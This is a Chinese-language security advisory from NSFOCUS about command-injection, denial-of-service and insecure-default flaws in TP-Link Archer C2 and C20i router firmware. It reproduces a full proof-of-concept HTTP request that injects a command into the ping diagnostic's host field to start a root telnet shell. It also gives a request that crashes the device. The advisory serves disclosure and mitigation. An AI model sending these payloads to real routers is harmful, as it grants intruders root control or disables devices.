TP-LINK Archer C2 和 TP-LINK Archer C20i都是该公司的路由器产品,近期这两款产品爆出多个严重漏洞,绿盟科技就此情况发布《TP-Link C2和C20i命令注入、拒绝服务等漏洞安全威胁通告》,通告全文如下:
日前,pierrekim.github.io网站发布了一个安全通告,公布了固件版本为“0.9.1 4.2 v0032.0 Build 160706 Rel.37961n”的TP-Link C2和C20i产品的多个漏洞。漏洞包括命令注入(需要身份认证)、拒绝服务以及不安全的默认配置。
命令注入漏洞
一个经过身份认证的攻击者,可以仅仅通过发送一个HTTP请求来进行命令注入,成功利用该漏洞,攻击者可以以root权限执行命令。该漏洞的一个POC如下:
POST /cgi?2 HTTP/1.1
Host: 192.168.1.1
Content-Type: text/plain
Referer: http://192.168.1.1/mainFrame.htm
Content-Length: 208
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
Connection: close
[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6
dataBlockSize=64
timeout=1
numberOfRepetitions=1
host=$(echo 127.0.0.1; /usr/sbin/telnetd -l bin/sh -p 25)
X_TP_ConnName=ewan_ipoe_d
diagnosticsState=Requested
当攻击者向具有漏洞设备的“Diagnostic”页面发送上述请求时,就可以得到一个远程shell:以root身份启动telnetd程序。
拒绝服务漏洞
一个经过身份认证的攻击者,可以通过向目标发送如下请求来导致设备崩溃:
GET /cgi/ansi HTTP/1.1
Host: 192.168.1.1
Content-Type: text/plain
Referer: http://192.168.1.1/mainFrame.htm
Content-Length: 208
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
Connection: close
不安全的默认配置
另外,这两款产品还存在不安全的IP Tables默认配置。该默认规则由/lib/libcmm.so产生,并将相关规则写入文件/var/tmp/dconf/rc.router。其中一条规则如下:
iptables -A INPUT -p udp --dport 161 -j ACCEPT
该规则导致SNMP协议端口在每个网卡接口上都开放。
然而幸运的是,虽然SNMP的相关配置可以通过/main/snmp.html页面进行修改,但是snmpd程序已经从固件镜像中删除了。
相关链接如下:https://pierrekim.github.io/advisories/2017-tplink-0x00.txt
受影响的版本
使用“0.9.1 4.2 v0032.0 Build 160706 Rel.37961n”版本固件的TP-Link C2和C20i。
规避方案
TP-Link厂商表示将会在今年发布补丁,以修补上述漏洞。作为临时的缓解策略,用户可以禁用WAN口的管理功能。
绿盟科技声明
本安全公告仅用来描述可能存在的安全问题,绿盟科技不为此安全公告提供任何保证或承诺。由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,绿盟科技以及安全公告作者不为此承担任何责任。绿盟科技拥有对此安全公告的修改和解释权。如欲转载或传播此安全公告,必须保证此安全公告的完整性,包括版权声明等全部内容。未经绿盟科技允许,不得任意修改或者增减此安全公告内容,不得以任何方式将其用于商业目的。
原文发布时间:2017年3月24日
本文由:绿盟科技发布,版权归属于原作者
原文链接:http://toutiao.secjia.com/tp-link-c2-and-c20i-vulnerability